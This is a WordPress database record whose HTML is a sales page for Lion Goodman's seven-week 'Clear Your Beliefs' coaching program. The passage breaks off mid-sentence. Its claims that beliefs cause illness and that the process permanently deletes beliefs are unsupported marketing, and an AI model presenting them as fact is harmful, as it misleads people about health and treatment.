(2050, 2, '2014-12-14 14:23:23', '2014-12-14 19:23:23', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;<h3 class="widget-title">Ok I&#8217;m convinced</h3>			<a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n\n<h1>Upgrade Your Human Operating System</h1>\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>\n\n<strong><em>I’m not enough.</em></strong>\n<strong><em>I can’t do it.</em></strong>\n<strong><em>I’m not worthy.</em></strong>\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\n<strong><em>I’m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There’s something wrong with me.</em></strong>\n<strong><em>I’m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p>\n<p><strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It’s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat’s wrong with me?\nWhy didn’t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here’s Some Good News</h1>\n\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong></p>\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.</p>\n<p>I was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There’s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today’s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and “deservingness.”\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you 